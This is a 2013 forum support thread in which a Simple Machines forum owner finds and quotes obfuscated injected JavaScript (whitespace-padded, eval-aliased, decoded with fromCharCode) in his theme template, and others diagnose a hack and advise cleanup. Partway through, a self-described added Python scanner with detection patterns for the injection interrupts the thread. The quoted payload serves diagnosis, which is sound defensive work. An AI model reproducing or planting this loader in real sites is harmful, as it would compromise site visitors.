Strange Code appearance

Started by [Crash_Override], January 09, 2013, 03:05:34 PM

[Crash_Override]

Logged into my forum this morning and noticed the text was larger, so I checked all the settings in the admin panel and they were correct. Downloaded the index.template.php file and noticed an extra amount of code that had been inserted last night.


<?
#336988#
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  echo "                                                                                                                                                                                                                                                                                                                                                                                                                                                                  <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                                                                                                                                  try{window.document.body++}catch(gdsgsdg){dbshre=231;}if(dbshre){asd=0;try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new 
Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,92,112,112,95,92,27,52,24,93,105,94,108,101,94,104,111,37,91,107,95,92,107,93,62,102,96,100,93,103,110,35,30,97,95,108,92,100,93,32,35,54,4,2,6,4,27,23,24,25,91,116,111,94,91,40,110,105,91,25,55,27,30,96,109,110,107,49,39,40,109,111,105,89,93,95,95,92,100,101,95,107,88,106,104,102,96,37,89,107,93,99,96,110,98,92,92,106,107,104,40,100,107,39,107,95,103,37,104,97,106,34,50,5,3,26,27,23,24,90,115,115,93,90,39,109,111,112,100,94,40,107,102,107,98,110,100,102,102,25,55,27,30,89,91,109,106,99,109,109,95,34,50,5,3,26,27,23,24,90,115,115,93,90,39,109,111,112,100,94,40,93,102,106,93,95,109,23,53,25,33,43,30,51,6,4,27,23,24,25,91,116,111,94,91,40,110,107,113,101,95,41,95,93,98,97,99,107,24,54,26,34,40,104,113,33,54,4,2,25,26,27,23,89,114,114,97,89,38,108,110,116,99,93,39,113,100,91,108,97,26,56,23,31,42,106,115,30,51,6,4,27,23,24,25,91,116,111,94,91,40,110,107,113,101,95,41,99,93,95,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,92,112,112,95,92,41,106,108,114,102,96,37,108,104,106,27,52,24,32,43,107,111,31,52,7,5,4,2,25,26,27,23,97,95,26,35,24,92,104,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,57,113,66,94,35,30,89,114,114,97,89,31,34,35,27,114,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,110,106,98,110,96,31,31,53,94,100,109,24,98,94,56,83,31,90,115,115,93,90,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,92,112,112,95,92,34,32,38,90,106,107,92,102,93,61,99,96,100,93,34,92,112,112,95,92,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s=\"\";for(i=0;i-510!=0;i++){if((020==0x10)&&window.document)s+=ss[\"fromCharCode\"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}</script>";

#/336988#
?>


Not sure if this is a security problem or paranoia but would like to know WTH this code is doing in and actually does to my forum?

NanoSector

It looks like you have been hacked.

Please refer to: http://wiki.simplemachines.org/smf/I_think_I_have_been_hacked

The page will provide you instructions for removing the hack and preventing it from happening again.

Good luck, post back if you need any help :)
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

emanuele

It seems related to hacks on some systems:
https://www.phpbb.com/community/viewtopic.php?f=46&t=2167644
http://evolution-xtreme.com/modules.php?name=Forums&file=viewtopic&p=39217
Also found something on WordPress, but there was no code.
It seems to add some JavaScript too.

I'd suggest you "clean up" everything (that could mean: check all your files to be sure there is no strange code around, up to deleting all the files and starting fresh, depending on your tastes) and maybe give a nudge to your host.

ETA: in other words, what Yoshi said! :P


Take a peek at what I'm doing! ;D




Do you need support in Italian?

Help us help you: explain your problem clearly: no, "it doesn't work" is not an explanation!!
1) What you do,
2) what you expect,
3) what you get.
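
The injected block in the first post has recognisable traits (the paired #336988# / #/336988# markers, hundreds of padding spaces, an aliased eval, and a long numeric array decoded with fromCharCode), so the "check all your files" advice above can be scripted. The following is an added example, not part of the original thread or of SMF: a Python scanner whose regular expressions, thresholds and sample files are constructed assumptions modelled on that block.

```python
import re
import tempfile
from pathlib import Path

# Indicators modelled on the injected block quoted in the first post.
INDICATORS = {
    "marker-block": re.compile(r"#(\d{4,8})#.*?#/\1#", re.S),  # #NNNNNN# ... #/NNNNNN#
    "whitespace-padding": re.compile(r"[ \t]{200,}"),           # payload pushed off-screen
    "numeric-array": re.compile(r"Array\(\s*\d{1,3}(?:\s*,\s*\d{1,3}){50,}"),
    "charcode-decoder": re.compile(r"fromCharCode"),
    "eval-alias": re.compile(r"\b\w+\s*=\s*eval\b"),            # e=eval hides the eval call
}

def scan_text(text):
    """Return the sorted names of the indicators present in one file's text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def is_suspicious(hits):
    # The marker pair alone is decisive; the other indicators also occur in
    # legitimate code, so require at least two of them together.
    return "marker-block" in hits or len(hits) >= 2

def scan_tree(root, suffixes=(".php", ".js", ".htm", ".html")):
    """Map each suspicious file (path relative to root) to its indicators."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if is_suspicious(hits):
                report[path.relative_to(root).as_posix()] = hits
    return report

def demo():
    """Scan a constructed theme directory: one injected file, one clean file."""
    filler = ",".join(str(30 + n % 90) for n in range(60))  # meaningless numbers
    injected = ("<?php\n#123456#\n" + " " * 300
                + 'echo "<script>e=eval;a=new Array(' + filler
                + ');/* fromCharCode decoder would follow */</script>";\n#/123456#\n?>\n')
    clean = "<?php echo '<script>var c = String.fromCharCode(65);</script>'; ?>\n"
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.template.php").write_text(injected)
        Path(root, "Display.template.php").write_text(clean)
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

A hit is a lead for manual review against a clean copy of the forum package; files that pass this scan can still carry injections that use a different pattern.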

NanoSector

I found the phpBB link as well, though it gave too little information about what the hack is or what caused the hole for them.

* Yoshi2889 loves hijacking people :P

kat

Can you change your avatar, please, CO?

It contains a virus (Probably due to your site being hacked).

NanoSector

Quote from: K@ on January 09, 2013, 03:33:29 PM
Can you change your avatar, please, CO?

It contains a virus (Probably due to your site being hacked).

Chrome for mobile refuses to display anything there, so could be a virus yes. Opening it in a new tab redirects me to what I suppose is your forum.

emanuele

His avatar is an attachment on his own forum that is in maintenance mode so it's "broken" ;)



[Crash_Override]

Well, I have taken the following measures:

1.) Removed all installed mods & themes

2.) Put the forum into Maintenance mode

3.) Ran the small update utility to fully patch my forum to 2.0.3

4.) Ran the kb_scan utility, all green

5.) Did check the avatar, all is well there

@ K@: If I still need to change the avatar please let me know

@Yoshi2889: if you got to the site 1013clan.com, yes, that is my forum. It may be in maintenance mode when you visited, as I had already started the procedure I listed above after writing this

Anything else I should do or mention in particular to my host about this issue? Thanks again folks

kat

Quote from: emanuele on January 09, 2013, 03:49:52 PM
His avatar is an attachment on his own forum that is in maintenance mode so it's "broken" ;)

Surely, that wouldn't throw up a virus warning, though?

emanuele

Quote from: K@ on January 09, 2013, 03:55:29 PM
Quote from: emanuele on January 09, 2013, 03:49:52 PM
His avatar is an attachment on his own forum that is in maintenance mode so it's "broken" ;)

Surely, that wouldn't throw up a virus warning, though?

Depends on the AV I can imagine (since it expects an image and instead it gets a web page he may become a bit upset), but not using one I don't know...



emanuele

Quote from: [Crash_Override] on January 09, 2013, 03:53:39 PM
well I have taken the following measures:

Do you have any other script on your site? (blog, CMS, other)
In that case I'd clean that too.



kat

The warning seems to have gone, now. So, all's good. :)

Opera just shows a blank space, or a placeholder, if an image is borked.

NanoSector

Quote from: K@ on January 09, 2013, 04:02:14 PM
The warning seems to have gone, now. So, all's good. :)

Opera just shows a blank space, or a placeholder, if an image is borked.

Same for chrome, 'pparently :)
Avast Mobile didn't go weird though, so I figured it would be okay for a good deal. (It scans Windows viruses afaik)

Anyways I edited the page to add a link to the security tips page.
Security Tips
Might be worth looking at :)
